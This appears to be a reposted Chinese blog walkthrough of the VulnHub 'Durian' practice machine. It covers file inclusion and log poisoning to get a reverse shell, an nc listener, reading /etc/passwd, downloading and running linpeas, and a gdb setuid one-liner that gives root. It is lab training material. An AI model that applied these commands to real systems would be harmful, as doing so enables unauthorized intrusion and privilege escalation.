0


文件上传漏之Durian靶场练习(完整版)——学习日记-渗透day14

一、准备工作

    下载地址:http://www.vulnhub.com/entry/durian-1,553/

    更改网络模式

    ![](https://img-blog.csdnimg.cn/9b0661e1ae3a4a959d233bee66bee52d.png)​

二、练习过程

    1、是kali对当当前网段进行探测,发现192.168.174.138网址
    netdiscover -r 192.168.174.0/24
    ![](https://img-blog.csdnimg.cn/00716b8d22844687a425dcf617854f68.png)​

    2、用浏览器访问192.168.174.138(80端口)、192.168.174.138:8088、192.168.174.138:8000、192.168.174.138:7080(7080是后台页面,其他为前台)地址,访问成功

     ![](https://img-blog.csdnimg.cn/e8eb4247db284eb0b91cecc876db65ed.png)​

    ![](https://img-blog.csdnimg.cn/97e8bbbd08b24115b8a2fbe0ad7289c6.png)​

    ![](https://img-blog.csdnimg.cn/92437be452614ed3a57b67e81928bbd3.png)​

    ![](https://img-blog.csdnimg.cn/eb200ef7d8ef4e87b7efeeb7d11e1893.png)​

    2、进入192.168.174.138/cgi-data

    ![](https://img-blog.csdnimg.cn/0a451e5167e547c2b711566f26d9d940.png)​

    进入getimage.php文件

    ![](https://img-blog.csdnimg.cn/84099b0e3d804ba385061dcbb542cd34.png)​

    查看源代码

    ![](https://img-blog.csdnimg.cn/1f1239c0e2fa401d9e217b211621fea7.png)​

    3、在 http://192.168.174.138/cgi-data/getImage.php 尝试使用文件包含语句,发现能够正常的包含这个文件

    ![](https://img-blog.csdnimg.cn/f944e2dc8c8b44a79452f6f4ddfd4f93.png)​

    4、尝试包含/var/log/durian.log/access.log,包含成功!

    ![](https://img-blog.csdnimg.cn/cec6557ef7db4878a09e5f54a1fb4c9d.png)​

    5、使用burpsuit对包含/var/log/durian.log/access.log的网页进行抓包并反弹shell

    ![](https://img-blog.csdnimg.cn/165ad5aff1c84730b3619fbfa628fa5d.png)​

    ![](https://img-blog.csdnimg.cn/4bc41f0ff70441bbb0f24de45ac3f680.png)​

    ![](https://img-blog.csdnimg.cn/c28e6fa4a17a4d8cb2e65ddc04838adb.png)​

    ![](https://img-blog.csdnimg.cn/dbb2711bb4044bc39281e9947e9a2b34.png)​

    ![](https://img-blog.csdnimg.cn/6d7c7737bcfa4f9687c36bbed9b41905.png)​

    kali对8888进行监听
    nc -lvvp 8888
    ![](https://img-blog.csdnimg.cn/9f3b4c29dd6845c085a499f226e5f2f3.png)​

    发送数据包

    ![](https://img-blog.csdnimg.cn/148cc232722b43cfacb08d5a843783c2.png)​

    反弹成功

    ![](https://img-blog.csdnimg.cn/796e25af013e4d89a0a954100e36bf4c.png)​

    但是使用nc -lvvp 8888无法进行退格因此我们使用rlwrap nc -lvvp 8888指令进行监听然后再次发送包

    ![](https://img-blog.csdnimg.cn/e52dee75aeec4dacb75070b0dc49da15.png)​

     6、查看当前id

    ![](https://img-blog.csdnimg.cn/eab0968fd2ca4f0e959ec0abebc02935.png)​

    7、开启交互式

    ![](https://img-blog.csdnimg.cn/4d9a3bf73ea8407d9997f7a03a9c9070.png)​
    python3 -c 'import pty;pty.spawn("/bin/bash")'
    ![](https://img-blog.csdnimg.cn/c5fb4106441f4308832de7d287ba2502.png)​

    8、进入/home目录下查看用户目录
    cd /home

    ls

`

    9、进入durian文件,查看目录下的信息
    cd durian

    ls -al
    ![](https://img-blog.csdnimg.cn/f717f4c68fe5474380aae96c565feb85.png)​

    10、查看/etc/passwd的内容,发现durian相关信息
    cat /etc/passwd
    ![](https://img-blog.csdnimg.cn/80673461a8b94c8781429adfe0c42501.png)​

    11、使用sudo查看信息进行提权
    sudo -l
    ![](https://img-blog.csdnimg.cn/3208132791a848069b5b5cf1ce9c7b2a.png)​

    12、查看/sbin/shutdown目录下的信息,发现这是个链接,这是一个可写的文件
    ls -al /sbin/shutdown
    ![](https://img-blog.csdnimg.cn/5797e42976914cde8675447fb2d3d9f2.png)​

    13、查看ls -al /bin/systemctl文件,发现这是一个可执行文件
    ls -al /bin/systemctl
    ![](https://img-blog.csdnimg.cn/27bb5c739dfc40a49fde54bddf8d05b5.png)​

    14、查看/bin/ping目录下的信息
    ls -al /bin/ping
    ![](https://img-blog.csdnimg.cn/84a9e36695d3479a8ccc7d691cdeb46b.png)​

     15、先进入/tmp目录下下载linpeas.sh(提权自动化的脚本)工具
    cd /tmp       

    wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
    ![](https://img-blog.csdnimg.cn/5db8f2c172a64d088952a7d714357101.png)​

    16、查看当前所有有文件,发现linpeas.sh是没有执行权限的
    ls -al
    ![](https://img-blog.csdnimg.cn/b933ef6be7214be2a3ad78c9369b4909.png)​

    17、给linpeas.sh加执行权限,再次查看
    chmod +x linpeas.sh

    ls -al
    ![](https://img-blog.csdnimg.cn/f779b575c8a44c378dc1624542bbfd71.png)​

    18、执行linpeas.sh并将结果输出给123.txt
    ./linpeas.sh > 123.txt
    19、开启9999端口
    python3 -m http.server 9999
    ![](https://img-blog.csdnimg.cn/11056223657640e59b57425a2ad17447.png)​

     20、新建一个kali的对话框

    ![](https://img-blog.csdnimg.cn/dffb8f56ab144ea8bd7c312c199d489f.png)​

    进入/tmp目录下
    cd /tmp
    下载文件123.txt
    wget http://192.168.174.138:9999/123.txt
    ![](https://img-blog.csdnimg.cn/1c7a711be8914db19fb76e9574652382.png)​

    查看123.txt      

cat 123.txt |more

      ![](https://img-blog.csdnimg.cn/5c92b1002d87490390781b9387c992a6.png)​   

    21、gdb是一个调试工具,具有高权限,回到上线的命令窗口查看是否有gdb,
    ls -al /bin/gdb
    ![](https://img-blog.csdnimg.cn/f610b01e3cd0483fa0110ed2784e295a.png)

    22、执行以下命令进行提权,然后查看当前权限
    /usr/bin/gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit

    id
    ![](https://img-blog.csdnimg.cn/eb3248e7a1ce4319b61d0c0d031492ac.png)

    23、添加交互式得到root权限
    python3 -c 'import pty;pty.spawn("/bin/bash")'
    ![](https://img-blog.csdnimg.cn/55a81323c6b74784bcd2ccd669b8d7e8.png)

    ![](https://img-blog.csdnimg.cn/3c69a407945f4054b073deb63b1e98bf.png)
标签: web安全

本文转载自: https://blog.csdn.net/qq_62716256/article/details/126859300
版权归原作者 菜鸟也疯狂!! 所有, 如有侵权,请联系我们删除。

“文件上传漏之Durian靶场练习(完整版)——学习日记-渗透day14”的评论:

还没有评论